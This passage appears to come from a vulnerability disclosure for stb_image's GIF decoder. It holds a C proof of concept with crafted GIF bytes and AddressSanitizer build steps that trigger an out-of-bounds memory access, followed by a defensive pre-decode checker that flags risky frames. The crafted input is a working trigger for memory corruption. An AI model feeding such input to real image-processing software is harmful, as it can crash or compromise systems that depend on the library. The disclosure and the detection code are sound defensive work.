        0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x05, 0x00, 0x02, 0x00, 0x47, 0x00, 0x41, 
        0x00, 0x00, 0x06, 0xff, 0x40, 0x90, 0x70, 0x48, 0x2c, 0x1a, 0x8f, 0x42, 0x80, 0x72, 0xb9, 0x44, 
        0x3a, 0x9f, 0xd0, 0x28, 0x92, 0xa9, 0x14, 0x58, 0xaf, 0xd7, 0xa6, 0x74, 0xcb, 0x9d, 0x2e, 0x03, 
        0x04, 0x0a, 0x06, 0xa3, 0x29, 0x9b, 0xcb, 0x98, 0x86, 0x61, 0x10, 0x00, 0x74, 0xdf, 0x52, 0xe6, 
        0x00, 0x81, 0xe9, 0x6c, 0x3b, 0x14, 0x83, 0xc0, 0x0d, 0xef, 0x17, 0xbf, 0x08, 0x1a, 0x7e, 0x1a, 
        0x0b, 0x03, 0x7e, 0x87, 0x4b, 0x02, 0x14, 0x87, 0x43, 0x1d, 0x08, 0x02, 0x8c, 0x5d, 0x4b, 0x03, 
        0x18, 0x91, 0x43, 0x1f, 0x18, 0x90, 0x96, 0x50, 0x4b, 0x06, 0x95, 0x40, 0x80, 0x70, 0x48, 0x2c, 
        0x1a, 0x8f, 0x46, 0x81, 0x72, 0xb9, 0x44, 0x3a, 0x9f, 0xd0, 0xe8, 0x51, 0x60, 0x40, 0x50, 0x34, 
        0xd8, 0x6c, 0x96, 0x82, 0x20, 0x08, 0xa4, 0xe0, 0x30, 0x32, 0x40, 0x68, 0x60, 0x3e, 0xe8, 0xb4, 
        0x5a, 0xed, 0xc1, 0x20, 0xbe, 0xe2, 0x78, 0x74, 0x80, 0xc0, 0x78, 0xd6, 0xf8, 0xfc, 0x07, 0x63, 
        0x08, 0xc8, 0xff, 0x45, 0x02, 0x08, 0x1a, 0x7a, 0x85, 0x78, 0x1e, 0x14, 0x03, 0x80, 0x80, 0x04, 
        0x67, 0x86, 0x8f, 0x6b, 0x1a, 0x7d, 0x8b, 0x61, 0x01, 0x08, 0x1d, 0x90, 0x99, 0x6c, 0xfe, 0x45, 
        0x05, 0x7f, 0x45, 0x10, 0x77, 0x21, 0x03, 0x44, 0xc0, 0x5f, 0x01, 0x0c, 0xf4, 0xa2, 0x41, 0x58, 
        0x85, 0xcc, 0x2a, 0xf5, 0x18, 0xa0, 0xe7, 0xe5, 0xd7, 0x03, 0x9c, 0xaf, 0x61, 0xbf, 0x00, 0x5e, 
        0xa7, 0x1f, 0x50, 0x01, 0x31, 0x66, 0x54, 0xde, 0x2e, 0xa7, 0x1e, 0xfc, 0x88, 0x79, 0x5e, 0x0c, 
        0x40, 0x68, 0x73, 0x71, 0xbf, 0x9d, 0x5e, 0x2c, 0x05, 0x71, 0x60, 0x80, 0xc0, 0x14, 0xf5, 0x22, 
        0x80, 0x88, 0x5d, 0x78, 0xe1, 0x2e, 0x99, 0x02, 0x8a, 0x67, 0xb1, 0x80, 0xf2, 0x93, 0x65, 0x5e, 
        0xa2, 0x07, 0x18, 0x2c, 0x40, 0x00, 0x1a, 0x7b, 0xbc, 0xe1, 0x45, 0x07, 0xb1, 0x57, 0xaf, 0xfc, 
        0x01, 0x3d, 0xab, 0x81, 0xc0, 0x79, 0x05, 0xe0, 0xc5, 0x40, 0x05, 0x3b, 0x82, 0x5d, 0x06, 0x05, 
        0xf8, 0xe3, 0x8f, 0x01, 0x06, 0x7e, 0xfc, 0x78, 0x57, 0xf5, 0xd6, 0xeb, 0x5e, 0xf6, 0x40, 0x91, 
        0x1b, 0xe8, 0x00, 0xb0, 0x7a, 0xc5, 0x63, 0xde, 0xfd, 0x6a, 0x51, 0x17, 0xe7, 0x0c, 0x0f, 0x80, 
        0xdc, 0x53, 0xc0, 0x02, 0x7c, 0x07, 0xb1, 0xbb, 0x70, 0x0f, 0x3d, 0x07, 0x44, 0x60, 0x04, 0x1a, 
        0x71, 0x37, 0x03, 0x3c, 0x20, 0x02, 0x0f, 0xc4, 0xdd, 0xfa, 0x8a, 0x37, 0xba, 0x42, 0x14, 0x6d, 
        0x01, 0x20, 0x94, 0x5d, 0x5e, 0x32, 0xc8, 0x00, 0x06, 0xc0, 0x2a, 0x59, 0x03, 0x68, 0xc2, 0x07, 
        0x5b, 0xc8, 0xc2, 0x07, 0x20, 0x20, 0x56, 0x83, 0x63, 0x82, 0x13, 0x16, 0x20, 0xac, 0x1e, 0x3a, 
        0xc1, 0x00, 0xd0, 0x03, 0x85, 0xd7, 0x60, 0x42, 0x44, 0x60, 0xac, 0x21, 0x08, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x3b, 0x0a
    };

    unsigned char *img = stbi_load_gif_from_memory(data, sizeof(data), &delays, &width, &height, &frames, &comp, 0);

    if (img != NULL) {
        printf("Loaded GIF: %dx%d, %d frames, %d components\n", width, height, frames, comp);
        stbi_image_free(img);
    } else {
        printf("Failed to load GIF from memory.\n");
    }

    if (delays != NULL) {
        STBI_FREE(delays);
    }

    return 0;
}

  1. Compile a test application with AddressSanitizer enabled:
    clang poc.c -o poc -g3 -fsanitize=address,undefined -I. -DSTB_IMAGE_IMPLEMENTATION -fno-omit-frame-pointer

  2. Execute the application; the data in the code will trigger the out-of-bounds memory access.
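
A pre-decode triage check, added here as an example; it is not part of the original report or of stb_image. In stb_image's GIF decoder the `two_back` copy quoted in the report is the handling of disposal method 3 ("restore to previous"), so this walker counts frames that request it, along with reserved disposal values and frame rectangles outside the logical screen, without decoding any pixels. The names `gif_audit`, `gif_audit_buffer` and `sample_gif` are hypothetical, and the sample bytes are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    int frames;         /* image descriptors seen */
    int restore_prev;   /* frames with disposal method 3 */
    int reserved_disp;  /* frames with reserved disposal values 4..7 */
    int out_of_screen;  /* frame rectangle exceeds the logical screen */
    int malformed;      /* unknown block tag, or no 0x3B trailer reached */
} gif_audit;
static unsigned rd16(const uint8_t *p) { return p[0] | ((unsigned)p[1] << 8); }
/* Skip a chain of data sub-blocks; returns the offset after the
 * zero-length terminator, or 0 if the chain runs past the buffer. */
static size_t skip_sub_blocks(const uint8_t *d, size_t n, size_t off) {
    while (off < n) {
        size_t len = d[off++];
        if (len == 0) return off;
        if (len > n - off) break;
        off += len;
    }
    return 0;
}

/* Returns -1 if the buffer has no GIF header, 0 otherwise (check a->malformed). */
int gif_audit_buffer(const uint8_t *d, size_t n, gif_audit *a) {
    memset(a, 0, sizeof *a);
    if (n < 13 || memcmp(d, "GIF8", 4) != 0 ||
        (d[4] != '7' && d[4] != '9') || d[5] != 'a') return -1;
    unsigned sw = rd16(d + 6), sh = rd16(d + 8), disposal = 0;
    size_t off = 13;
    if (d[10] & 0x80) off += (size_t)3 << ((d[10] & 7) + 1); /* global palette */
    while (off < n) {
        uint8_t tag = d[off++];
        if (tag == 0x3B) return 0;                 /* trailer: clean end */
        if (tag == 0x21) {                         /* extension block */
            if (n - off < 2) break;
            uint8_t label = d[off++];
            if (label == 0xF9 && n - off >= 2 && d[off] == 4)
                disposal = (d[off + 1] >> 2) & 7;  /* graphic control packed byte */
            if ((off = skip_sub_blocks(d, n, off)) == 0) break;
        } else if (tag == 0x2C) {                  /* image descriptor */
            if (n - off < 9) break;
            unsigned x = rd16(d + off), y = rd16(d + off + 2), w = rd16(d + off + 4), h = rd16(d + off + 6);
            uint8_t flags = d[off + 8];
            off += 9;
            a->frames++;
            if (disposal == 3) a->restore_prev++;
            else if (disposal > 3) a->reserved_disp++;
            if (x + w > sw || y + h > sh) a->out_of_screen++;
            disposal = 0;                          /* applies to one frame only */
            if (flags & 0x80) off += (size_t)3 << ((flags & 7) + 1); /* local palette */
            /* one byte of LZW minimum code size, then the image data sub-blocks */
            if (off >= n || (off = skip_sub_blocks(d, n, off + 1)) == 0) break;
        } else break;                              /* unknown block tag */
    }
    a->malformed = 1;
    return 0;
}

/* Constructed 2x2 sample: frame 1 has disposal 1; frame 2 has disposal 3 and overruns the screen. */
static const uint8_t sample_gif[] = {
    'G','I','F','8','9','a', 2,0, 2,0, 0x00, 0, 0,
    0x21,0xF9,4, 0x04,0,0,0, 0,  0x2C, 0,0, 0,0, 2,0, 2,0, 0x00,  2, 2,0x4C,0x01, 0,
    0x21,0xF9,4, 0x0C,0,0,0, 0,  0x2C, 1,0, 1,0, 2,0, 2,0, 0x00,  2, 2,0x4C,0x01, 0,  0x3B
};

int main(void) {
    gif_audit a;
    int rc = gif_audit_buffer(sample_gif, sizeof sample_gif, &a);
    printf("rc=%d frames=%d restore_prev=%d reserved=%d out_of_screen=%d malformed=%d\n", rc,
           a.frames, a.restore_prev, a.reserved_disp, a.out_of_screen, a.malformed);
    return rc != 0;
}
```

An application that must keep using an unpatched decoder can use a non-zero `restore_prev`, `reserved_disp`, `out_of_screen` or `malformed` count to reject the input or route it to a sandboxed process.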